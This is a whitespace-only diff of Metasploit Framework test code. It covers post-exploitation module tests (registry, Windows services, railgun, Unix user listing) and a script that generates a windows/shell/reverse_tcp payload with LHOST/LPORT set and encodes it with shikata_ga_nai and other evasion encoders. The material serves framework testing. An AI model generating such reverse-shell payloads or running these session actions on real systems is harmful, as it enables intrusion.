session.sniffer.interfaces.kind_of? Array
end
it "should list interfaces for sniffing" do
session.sniffer.interfaces.kind_of? Array
end
# XXX: how do we test this more thoroughly in a generic way?
end
# XXX: how do we test this more thoroughly in a generic way?
end
=end
def cleanup
vprint_status("Cleanup: changing working directory back to #{@old_pwd}")
session.fs.dir.chdir(@old_pwd)
super
end
def cleanup
vprint_status("Cleanup: changing working directory back to #{@old_pwd}")
session.fs.dir.chdir(@old_pwd)
super
end
protected
def create_directory(name)
res = true
def create_directory(name)
res = true
session.fs.dir.mkdir(name)
entries = session.fs.dir.entries
res &&= entries.include?(name)
res &&= session.fs.file.stat(name).directory?
if res
vprint_status("Directory created successfully")
end
session.fs.dir.mkdir(name)
entries = session.fs.dir.entries
res &&= entries.include?(name)
res &&= session.fs.file.stat(name).directory?
if res
vprint_status("Directory created successfully")
end
res
end
res
end
end
@@ -15,83 +15,83 @@ require 'module_test'
class Metasploit3 < Msf::Post
include Msf::ModuleTest::PostTest
include Msf::Post::Windows::Railgun
include Msf::ModuleTest::PostTest
include Msf::Post::Windows::Railgun
def initialize(info={})
super( update_info( info,
'Name' => 'railgun_testing',
'Description' => %q{ This module will test railgun code used in post modules},
'License' => MSF_LICENSE,
'Author' => [ 'kernelsmith'],
'Platform' => [ 'windows' ]
))
def initialize(info={})
super( update_info( info,
'Name' => 'railgun_testing',
'Description' => %q{ This module will test railgun code used in post modules},
'License' => MSF_LICENSE,
'Author' => [ 'kernelsmith'],
'Platform' => [ 'windows' ]
))
register_options(
[
OptInt.new("ERR_CODE", [ false, "Error code to reverse lookup" ]),
OptInt.new("WIN_CONST", [ false, "Windows constant to reverse lookup" ]),
OptRegexp.new("WCREGEX", [ false, "Regexp to apply to constant rev lookup" ]),
OptRegexp.new("ECREGEX", [ false, "Regexp to apply to error code lookup" ]),
], self.class)
register_options(
[
OptInt.new("ERR_CODE", [ false, "Error code to reverse lookup" ]),
OptInt.new("WIN_CONST", [ false, "Windows constant to reverse lookup" ]),
OptRegexp.new("WCREGEX", [ false, "Regexp to apply to constant rev lookup" ]),
OptRegexp.new("ECREGEX", [ false, "Regexp to apply to error code lookup" ]),
], self.class)
end
end
def test_static
def test_static
it "should return a constant name given a const and a filter" do
ret = true
results = select_const_names(4, /^SERVICE/)
it "should return a constant name given a const and a filter" do
ret = true
results = select_const_names(4, /^SERVICE/)
ret &&= !!(results.kind_of? Array)
# All of the returned values should match the filter and have the same value
results.each { |const|
ret &&= !!(const =~ /^SERVICE/)
ret &&= !!(session.railgun.constant_manager.parse(const) == 4)
}
ret &&= !!(results.kind_of? Array)
# All of the returned values should match the filter and have the same value
results.each { |const|
ret &&= !!(const =~ /^SERVICE/)
ret &&= !!(session.railgun.constant_manager.parse(const) == 4)
}
# Should include things that match the filter and the value
ret &&= !!(results.include? "SERVICE_RUNNING")
# Should NOT include things that match the value but not the filter
ret &&= !!(not results.include? "CLONE_FLAG_ENTITY")
# Should include things that match the filter and the value
ret &&= !!(results.include? "SERVICE_RUNNING")
# Should NOT include things that match the value but not the filter
ret &&= !!(not results.include? "CLONE_FLAG_ENTITY")
ret
end
ret
end
it "should return an error string given an error code" do
ret = true
results = lookup_error(0x420, /^ERROR_SERVICE/)
ret &&= !!(results.kind_of? Array)
ret &&= !!(results.length == 1)
it "should return an error string given an error code" do
ret = true
results = lookup_error(0x420, /^ERROR_SERVICE/)
ret &&= !!(results.kind_of? Array)
ret &&= !!(results.length == 1)
ret
end
ret
end
end
end
def test_datastore
def test_datastore
if (datastore["WIN_CONST"])
it "should look up arbitrary constants" do
ret = true
results = select_const_names(datastore['WIN_CONST'], datastore['WCREGEX'])
#vprint_status("RESULTS: #{results.class} #{results.pretty_inspect}")
if (datastore["WIN_CONST"])
it "should look up arbitrary constants" do
ret = true
results = select_const_names(datastore['WIN_CONST'], datastore['WCREGEX'])
#vprint_status("RESULTS: #{results.class} #{results.pretty_inspect}")
ret
end
end
ret
end
end
if (datastore["ERR_CODE"])
it "should look up arbitrary error codes" do
ret = true
results = lookup_error(datastore['ERR_CODE'], datastore['ECREGEX'])
#vprint_status("RESULTS: #{results.class} #{results.inspect}")
if (datastore["ERR_CODE"])
it "should look up arbitrary error codes" do
ret = true
results = lookup_error(datastore['ERR_CODE'], datastore['ECREGEX'])
#vprint_status("RESULTS: #{results.class} #{results.inspect}")
ret
end
end
ret
end
end
end
end
end
+112 -112
@@ -15,141 +15,141 @@ require 'module_test'
class Metasploit3 < Msf::Post
include Msf::ModuleTest::PostTest
include Msf::Post::Windows::Registry
include Msf::ModuleTest::PostTest
include Msf::Post::Windows::Registry
def initialize(info={})
super( update_info( info,
'Name' => 'registry_post_testing',
'Description' => %q{ This module will test Post::Windows::Registry API methods },
'License' => MSF_LICENSE,
'Author' => [
'kernelsmith', # original
'egypt', # PostTest conversion
],
'Platform' => [ 'windows' ]
))
end
def initialize(info={})
super( update_info( info,
'Name' => 'registry_post_testing',
'Description' => %q{ This module will test Post::Windows::Registry API methods },
'License' => MSF_LICENSE,
'Author' => [
'kernelsmith', # original
'egypt', # PostTest conversion
],
'Platform' => [ 'windows' ]
))
end
def test_0_registry_read
pending "should evaluate key existence" do
# these methods are not implemented
k_exists = registry_key_exist?(%q#HKCU\Environment#)
k_dne = registry_key_exist?(%q#HKLM\\Non\Existent\Key#)
def test_0_registry_read
pending "should evaluate key existence" do
# these methods are not implemented
k_exists = registry_key_exist?(%q#HKCU\Environment#)
k_dne = registry_key_exist?(%q#HKLM\\Non\Existent\Key#)
(k_exists && !k_dne)
end
(k_exists && !k_dne)
end
pending "should evaluate value existence" do
# these methods are not implemented
v_exists = registry_value_exist?(%q#HKCU\Environment#, "TEMP")
v_dne = registry_value_exist?(%q#HKLM\\Non\Existent\Key#, "asdf")
pending "should evaluate value existence" do
# these methods are not implemented
v_exists = registry_value_exist?(%q#HKCU\Environment#, "TEMP")
v_dne = registry_value_exist?(%q#HKLM\\Non\Existent\Key#, "asdf")
(v_exists && !v_dne)
end
(v_exists && !v_dne)
end
it "should read values" do
ret = true
valinfo = registry_getvalinfo(%q#HKCU\Environment#, "TEMP")
ret &&= !!(valinfo["Data"])
ret &&= !!(valinfo["Type"])
it "should read values" do
ret = true
valinfo = registry_getvalinfo(%q#HKCU\Environment#, "TEMP")
ret &&= !!(valinfo["Data"])
ret &&= !!(valinfo["Type"])
valdata = registry_getvaldata(%q#HKCU\Environment#, "TEMP")
ret &&= !!(valinfo["Data"] == valdata)
valdata = registry_getvaldata(%q#HKCU\Environment#, "TEMP")
ret &&= !!(valinfo["Data"] == valdata)
ret
end
ret
end
it "should return normalized values" do
ret = true
valinfo = registry_getvalinfo(%q#HKCU\Environment#, "TEMP")
if (valinfo.nil?)
ret = false
else
# type == 2 means string
ret &&= !!(valinfo["Type"] == 2)
ret &&= !!(valinfo["Data"].kind_of? String)
it "should return normalized values" do
ret = true
valinfo = registry_getvalinfo(%q#HKCU\Environment#, "TEMP")
if (valinfo.nil?)
ret = false
else
# type == 2 means string
ret &&= !!(valinfo["Type"] == 2)
ret &&= !!(valinfo["Data"].kind_of? String)
valinfo = registry_getvalinfo(%q#HKLM\Software\Microsoft\Active Setup#, "DisableRepair")
if (valinfo.nil?)
ret = false
else
# type == 4 means DWORD
ret &&= !!(valinfo["Type"] == 4)
ret &&= !!(valinfo["Data"].kind_of? Numeric)
end
end
valinfo = registry_getvalinfo(%q#HKLM\Software\Microsoft\Active Setup#, "DisableRepair")
if (valinfo.nil?)
ret = false
else
# type == 4 means DWORD
ret &&= !!(valinfo["Type"] == 4)
ret &&= !!(valinfo["Data"].kind_of? Numeric)
end
end
ret
end
ret
end
it "should enumerate keys and values" do
ret = true
# Has no keys, should return an empty Array
keys = registry_enumkeys(%q#HKCU\Environment#)
ret &&= (keys.kind_of? Array)
it "should enumerate keys and values" do
ret = true
# Has no keys, should return an empty Array
keys = registry_enumkeys(%q#HKCU\Environment#)
ret &&= (keys.kind_of? Array)
vals = registry_enumvals(%q#HKCU\Environment#)
ret &&= (vals.kind_of? Array)
ret &&= (vals.count > 0)
ret &&= (vals.include? "TEMP")
vals = registry_enumvals(%q#HKCU\Environment#)
ret &&= (vals.kind_of? Array)
ret &&= (vals.count > 0)
ret &&= (vals.include? "TEMP")
ret
end
ret
end
end
end
def test_1_registry_write
it "should create keys" do
ret = registry_createkey(%q#HKCU\test_key#)
end
def test_1_registry_write
it "should create keys" do
ret = registry_createkey(%q#HKCU\test_key#)
end
it "should write REG_SZ values" do
ret = true
registry_setvaldata(%q#HKCU\test_key#, "test_val_str", "str!", "REG_SZ")
registry_setvaldata(%q#HKCU\test_key#, "test_val_dword", 1234, "REG_DWORD")
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_str")
if (valinfo.nil?)
ret = false
else
# type == REG_SZ means string
ret &&= !!(valinfo["Type"] == 1)
ret &&= !!(valinfo["Data"].kind_of? String)
ret &&= !!(valinfo["Data"] == "str!")
end
it "should write REG_SZ values" do
ret = true
registry_setvaldata(%q#HKCU\test_key#, "test_val_str", "str!", "REG_SZ")
registry_setvaldata(%q#HKCU\test_key#, "test_val_dword", 1234, "REG_DWORD")
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_str")
if (valinfo.nil?)
ret = false
else
# type == REG_SZ means string
ret &&= !!(valinfo["Type"] == 1)
ret &&= !!(valinfo["Data"].kind_of? String)
ret &&= !!(valinfo["Data"] == "str!")
end
ret
end
ret
end
it "should write REG_DWORD values" do
ret = true
registry_setvaldata(%q#HKCU\test_key#, "test_val_dword", 1234, "REG_DWORD")
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_dword")
if (valinfo.nil?)
ret = false
else
ret &&= !!(valinfo["Type"] == 4)
ret &&= !!(valinfo["Data"].kind_of? Numeric)
ret &&= !!(valinfo["Data"] == 1234)
end
ret
end
it "should write REG_DWORD values" do
ret = true
registry_setvaldata(%q#HKCU\test_key#, "test_val_dword", 1234, "REG_DWORD")
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_dword")
if (valinfo.nil?)
ret = false
else
ret &&= !!(valinfo["Type"] == 4)
ret &&= !!(valinfo["Data"].kind_of? Numeric)
ret &&= !!(valinfo["Data"] == 1234)
end
ret
end
it "should delete keys" do
ret = registry_deleteval(%q#HKCU\test_key#, "test_val_str")
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_str")
# getvalinfo should return nil for a non-existent key
ret &&= (valinfo.nil?)
ret &&= registry_deletekey(%q#HKCU\test_key#)
# Deleting the key should delete all its values
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_dword")
ret &&= (valinfo.nil?)
it "should delete keys" do
ret = registry_deleteval(%q#HKCU\test_key#, "test_val_str")
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_str")
# getvalinfo should return nil for a non-existent key
ret &&= (valinfo.nil?)
ret &&= registry_deletekey(%q#HKCU\test_key#)
# Deleting the key should delete all its values
valinfo = registry_getvalinfo(%q#HKCU\test_key#, "test_val_dword")
ret &&= (valinfo.nil?)
ret
end
ret
end
end
end
end
+142 -142
@@ -11,176 +11,176 @@ require 'module_test'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Services
include Msf::Post::Windows::Services
include Msf::ModuleTest::PostTest
include Msf::ModuleTest::PostTest
def initialize(info={})
super( update_info( info,
'Name' => 'Test Post::Windows::Services',
'Description' => %q{ This module will test windows services methods within a shell},
'License' => MSF_LICENSE,
'Author' => [ 'kernelsmith', 'egypt' ],
'Version' => '$Revision: 11663 $',
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
))
register_options(
[
OptString.new("QSERVICE" , [true, "Service (keyname) to query", "winmgmt"]),
OptString.new("NSERVICE" , [true, "New Service (keyname) to create/del", "testes"]),
OptString.new("SSERVICE" , [true, "Service (keyname) to start/stop", "W32Time"]),
OptString.new("DNAME" , [true, "Display name used for create test", "Cool display name"]),
OptString.new("BINPATH" , [true, "Binary path for create test", "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs"]),
OptEnum.new("MODE", [true, "Mode to use for startup/create tests", "auto",
["auto", "manual", "disable"]
]),
], self.class)
def initialize(info={})
super( update_info( info,
'Name' => 'Test Post::Windows::Services',
'Description' => %q{ This module will test windows services methods within a shell},
'License' => MSF_LICENSE,
'Author' => [ 'kernelsmith', 'egypt' ],
'Version' => '$Revision: 11663 $',
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
))
register_options(
[
OptString.new("QSERVICE" , [true, "Service (keyname) to query", "winmgmt"]),
OptString.new("NSERVICE" , [true, "New Service (keyname) to create/del", "testes"]),
OptString.new("SSERVICE" , [true, "Service (keyname) to start/stop", "W32Time"]),
OptString.new("DNAME" , [true, "Display name used for create test", "Cool display name"]),
OptString.new("BINPATH" , [true, "Binary path for create test", "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs"]),
OptEnum.new("MODE", [true, "Mode to use for startup/create tests", "auto",
["auto", "manual", "disable"]
]),
], self.class)
end
end
def test_start
it "should start #{datastore["SSERVICE"]}" do
ret = true
results = service_start(datastore['SSERVICE'])
if results != 0
# Failed the first time, try to stop it first, then try again
service_stop(datastore['SSERVICE'])
results = service_start(datastore['SSERVICE'])
end
ret &&= (results == 0)
def test_start
it "should start #{datastore["SSERVICE"]}" do
ret = true
results = service_start(datastore['SSERVICE'])
if results != 0
# Failed the first time, try to stop it first, then try again
service_stop(datastore['SSERVICE'])
results = service_start(datastore['SSERVICE'])
end
ret &&= (results == 0)
ret
end
it "should stop #{datastore["SSERVICE"]}" do
ret = true
results = service_stop(datastore['SSERVICE'])
ret &&= (results == 0)
ret
end
it "should stop #{datastore["SSERVICE"]}" do
ret = true
results = service_stop(datastore['SSERVICE'])
ret &&= (results == 0)
ret
end
end
ret
end
end
def test_list
it "should list services" do
ret = true
results = service_list
def test_list
it "should list services" do
ret = true
results = service_list
ret &&= results.kind_of? Array
ret &&= results.length > 0
ret &&= results.include? datastore["QSERVICE"]
ret &&= results.kind_of? Array
ret &&= results.length > 0
ret &&= results.include? datastore["QSERVICE"]
ret
end
end
ret
end
end
def test_info
it "should return info on a given service" do
ret = true
results = service_info(datastore['QSERVICE'])
def test_info
it "should return info on a given service" do
ret = true
results = service_info(datastore['QSERVICE'])
ret &&= results.kind_of? Hash
if ret
ret &&= results.has_key? "Name"
ret &&= (results["Name"] == "Windows Management Instrumentation")
ret &&= results.has_key? "Startup"
ret &&= results.has_key? "Command"
ret &&= results.has_key? "Credentials"
end
ret &&= results.kind_of? Hash
if ret
ret &&= results.has_key? "Name"
ret &&= (results["Name"] == "Windows Management Instrumentation")
ret &&= results.has_key? "Startup"
ret &&= results.has_key? "Command"
ret &&= results.has_key? "Credentials"
end
ret
end
end
ret
end
end
def test_create
it "should create a service" do
mode = case datastore["MODE"]
when "disable"; 4
when "manual"; 3
when "auto"; 2
else; 2
end
ret = service_create(datastore['NSERVICE'],datastore['DNAME'],datastore['BINPATH'],mode)
def test_create
it "should create a service" do
mode = case datastore["MODE"]
when "disable"; 4
when "manual"; 3
when "auto"; 2
else; 2
end
ret = service_create(datastore['NSERVICE'],datastore['DNAME'],datastore['BINPATH'],mode)
ret
end
ret
end
it "should return info on the newly-created service" do
ret = true
results = service_info(datastore['NSERVICE'])
it "should return info on the newly-created service" do
ret = true
results = service_info(datastore['NSERVICE'])
ret &&= results.kind_of? Hash
ret &&= results.has_key? "Name"
ret &&= (results["Name"] == datastore["DNAME"])
ret &&= results.has_key? "Startup"
ret &&= (results["Startup"].downcase == datastore["MODE"])
ret &&= results.has_key? "Command"
ret &&= results.has_key? "Credentials"
ret &&= results.kind_of? Hash
ret &&= results.has_key? "Name"
ret &&= (results["Name"] == datastore["DNAME"])
ret &&= results.has_key? "Startup"
ret &&= (results["Startup"].downcase == datastore["MODE"])
ret &&= results.has_key? "Command"
ret &&= results.has_key? "Credentials"
ret
end
ret
end
it "should delete the new service" do
ret = service_delete(datastore['NSERVICE'])
it "should delete the new service" do
ret = service_delete(datastore['NSERVICE'])
ret
end
end
ret
end
end
=begin
def run
blab = datastore['VERBOSE']
print_status("Running against session #{datastore["SESSION"]}")
print_status("Session type is #{session.type}")
print_status("Verbosity is set to #{blab.to_s}")
print_status("Don't be surprised to see some errors as the script is faster")
print_line("than the windows SCM, just make sure the errors are sane. You can")
print_line("set VERBOSE to true to see more details")
def run
blab = datastore['VERBOSE']
print_status("Running against session #{datastore["SESSION"]}")
print_status("Session type is #{session.type}")
print_status("Verbosity is set to #{blab.to_s}")
print_status("Don't be surprised to see some errors as the script is faster")
print_line("than the windows SCM, just make sure the errors are sane. You can")
print_line("set VERBOSE to true to see more details")
print_status()
print_status("TESTING service_query_ex on servicename: #{datastore["QSERVICE"]}")
results = service_query_ex(datastore['QSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status()
print_status("TESTING service_query_ex on servicename: #{datastore["QSERVICE"]}")
results = service_query_ex(datastore['QSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status()
print_status("TESTING service_query_config on servicename: #{datastore["QSERVICE"]}")
results = service_query_config(datastore['QSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status()
print_status("TESTING service_query_config on servicename: #{datastore["QSERVICE"]}")
results = service_query_config(datastore['QSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status()
print_status("TESTING service_change_startup on servicename: #{datastore['QSERVICE']} " +
"to #{datastore['MODE']}")
results = service_change_startup(datastore['QSERVICE'],datastore['MODE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab
print_status()
print_status("TESTING service_change_startup on servicename: #{datastore['QSERVICE']} " +
"to #{datastore['MODE']}")
results = service_change_startup(datastore['QSERVICE'],datastore['MODE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab
print_status()
print_status("TESTING service_start on servicename: #{datastore['SSERVICE']}")
results = service_start(datastore['SSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['SSERVICE']).pretty_inspect}") if blab
print_status("Sleeping to give the service a chance to start")
select(nil, nil, nil, 2) # give the service time to start, reduces false negatives
print_status()
print_status("TESTING service_start on servicename: #{datastore['SSERVICE']}")
results = service_start(datastore['SSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['SSERVICE']).pretty_inspect}") if blab
print_status("Sleeping to give the service a chance to start")
select(nil, nil, nil, 2) # give the service time to start, reduces false negatives
print_status()
print_status("TESTING service_stop on servicename: #{datastore['SSERVICE']}")
results = service_stop(datastore['SSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['SSERVICE']).pretty_inspect}") if blab
print_status()
print_status("TESTING service_stop on servicename: #{datastore['SSERVICE']}")
results = service_stop(datastore['SSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['SSERVICE']).pretty_inspect}") if blab
print_status()
print_status("TESTING service_delete on servicename: #{datastore['NSERVICE']}")
results = service_delete(datastore['NSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab
print_status()
print_status("Testing complete.")
end
print_status()
print_status("TESTING service_delete on servicename: #{datastore['NSERVICE']}")
results = service_delete(datastore['NSERVICE'])
print_status("RESULTS: #{results.class} #{results.pretty_inspect}")
print_status("Current status of this service " +
"#{service_query_ex(datastore['QSERVICE']).pretty_inspect}") if blab
print_status()
print_status("Testing complete.")
end
=end
end
+32 -32
@@ -9,42 +9,42 @@ require 'module_test'
class Metasploit4 < Msf::Post
include Msf::ModuleTest::PostTest
include Msf::Post::Linux::System
include Msf::Post::Unix
include Msf::Post::Common
include Msf::ModuleTest::PostTest
include Msf::Post::Linux::System
include Msf::Post::Unix
include Msf::Post::Common
def initialize(info={})
super( update_info( info,
'Name' => 'Testing Remote Unix System Manipulation',
'Description' => %q{ This module will test Post::File API methods },
'License' => MSF_LICENSE,
'Author' => [ 'egypt'],
'Platform' => [ 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
))
end
def initialize(info={})
super( update_info( info,
'Name' => 'Testing Remote Unix System Manipulation',
'Description' => %q{ This module will test Post::File API methods },
'License' => MSF_LICENSE,
'Author' => [ 'egypt'],
'Platform' => [ 'linux', 'java' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
))
end
def test_unix
it "should list users" do
ret = true
users = get_users
ret &&= users.kind_of? Array
ret &&= users.length > 0
have_root = false
if ret
users.each { |u|
next unless u[:name] == "root"
have_root = true
}
end
ret
ret &&= have_root
def test_unix
it "should list users" do
ret = true
users = get_users
ret &&= users.kind_of? Array
ret &&= users.length > 0
have_root = false
if ret
users.each { |u|
next unless u[:name] == "root"
have_root = true
}
end
ret
ret &&= have_root
ret
end
ret
end
end
end
end
+7 -7
@@ -1,12 +1,12 @@
require 'testbase'
describe Msf::Simple::Framework do
$msf.modules.each_module do |name, mod|
ref = name
klass = mod
it "should be able create #{ref}" do
e = $msf.modules.create(ref)
$msf.modules.each_module do |name, mod|
ref = name
klass = mod
it "should be able create #{ref}" do
e = $msf.modules.create(ref)
e.should_not == nil
end
end
end
end
end
@@ -1,14 +1,14 @@
require 'testbase'
describe Msf::Simple::Framework do
$msf.exploits.each_module do |name, mod|
e = $msf.exploits.create(name)
e.targets.each_with_index do |t, idx|
it "#{name} target #{idx} should have compatible payloads" do
e.datastore['TARGET'] = idx
r = e.compatible_payloads
r.length.should_not == 0
end
end
end
$msf.exploits.each_module do |name, mod|
e = $msf.exploits.create(name)
e.targets.each_with_index do |t, idx|
it "#{name} target #{idx} should have compatible payloads" do
e.datastore['TARGET'] = idx
r = e.compatible_payloads
r.length.should_not == 0
end
end
end
end
+66 -66
@@ -6,7 +6,7 @@
msfbase = __FILE__
while File.symlink?(msfbase)
msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
end
$:.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', '..', 'lib')))
@@ -20,100 +20,100 @@ $msf = Msf::Simple::Framework.create
EXPLOITS = $msf.exploits
def print_line( message )
$stdout.puts( message )
$stdout.puts( message )
end
def format_badchars( badchars )
str = ''
if( badchars )
badchars.each_byte do | b |
str << "\\x%02X" % [ b ]
end
end
str
str = ''
if( badchars )
badchars.each_byte do | b |
str << "\\x%02X" % [ b ]
end
end
str
end
def encoder_v_payload( encoder_name, payload, verbose=false )
success = 0
fail = 0
EXPLOITS.each_module do | name, mod |
exploit = mod.new
print_line( "\n#{encoder_name} v #{name} (#{ format_badchars( exploit.payload_badchars ) })" ) if verbose
begin
encoder = $msf.encoders.create( encoder_name )
raw = encoder.encode( payload, exploit.payload_badchars, nil, nil )
success += 1
rescue
print_line( " FAILED! badchars=#{ format_badchars( exploit.payload_badchars ) }\n" ) if verbose
fail += 1
end
end
return [ success, fail ]
success = 0
fail = 0
EXPLOITS.each_module do | name, mod |
exploit = mod.new
print_line( "\n#{encoder_name} v #{name} (#{ format_badchars( exploit.payload_badchars ) })" ) if verbose
begin
encoder = $msf.encoders.create( encoder_name )
raw = encoder.encode( payload, exploit.payload_badchars, nil, nil )
success += 1
rescue
print_line( " FAILED! badchars=#{ format_badchars( exploit.payload_badchars ) }\n" ) if verbose
fail += 1
end
end
return [ success, fail ]
end
def generate_payload( name )
payload = $msf.payloads.create( name )
# set options for a reverse_tcp payload
payload.datastore['LHOST'] = '192.168.2.1'
payload.datastore['RHOST'] = '192.168.2.254'
payload.datastore['RPORT'] = '5432'
payload.datastore['LPORT'] = '4444'
# set options for an exec payload
payload.datastore['CMD'] = 'calc'
# set generic options
payload.datastore['EXITFUNC'] = 'thread'
payload = $msf.payloads.create( name )
# set options for a reverse_tcp payload
payload.datastore['LHOST'] = '192.168.2.1'
payload.datastore['RHOST'] = '192.168.2.254'
payload.datastore['RPORT'] = '5432'
payload.datastore['LPORT'] = '4444'
# set options for an exec payload
payload.datastore['CMD'] = 'calc'
# set generic options
payload.datastore['EXITFUNC'] = 'thread'
return payload.generate
return payload.generate
end
def run( encoders, payload_name, verbose=false )
payload = generate_payload( payload_name )
payload = generate_payload( payload_name )
table = Rex::Ui::Text::Table.new(
'Header' => 'Encoder v Payload Test - ' + ::Time.new.strftime( "%d-%b-%Y %H:%M:%S" ),
'Indent' => 4,
'Columns' => [ 'Encoder Name', 'Success', 'Fail' ]
)
table = Rex::Ui::Text::Table.new(
'Header' => 'Encoder v Payload Test - ' + ::Time.new.strftime( "%d-%b-%Y %H:%M:%S" ),
'Indent' => 4,
'Columns' => [ 'Encoder Name', 'Success', 'Fail' ]
)
encoders.each do | encoder_name |
encoders.each do | encoder_name |
success, fail = encoder_v_payload( encoder_name, payload, verbose )
success, fail = encoder_v_payload( encoder_name, payload, verbose )
table << [ encoder_name, success, fail ]
end
table << [ encoder_name, success, fail ]
end
return table
return table
end
if( $0 == __FILE__ )
print_line( "[+] Starting.\n" )
print_line( "[+] Starting.\n" )
encoders = [
'x86/bloxor',
'x86/shikata_ga_nai',
'x86/jmp_call_additive',
'x86/fnstenv_mov',
'x86/countdown',
'x86/call4_dword_xor'
]
encoders = [
'x86/bloxor',
'x86/shikata_ga_nai',
'x86/jmp_call_additive',
'x86/fnstenv_mov',
'x86/countdown',
'x86/call4_dword_xor'
]
payload_name = 'windows/shell/reverse_tcp'
verbose = false
result_table = run( encoders, payload_name, verbose )
payload_name = 'windows/shell/reverse_tcp'
verbose = false
result_table = run( encoders, payload_name, verbose )
print_line( "\n\n#{result_table.to_s}\n\n" )
print_line( "\n\n#{result_table.to_s}\n\n" )
print_line( "[+] Finished.\n" )
print_line( "[+] Finished.\n" )
end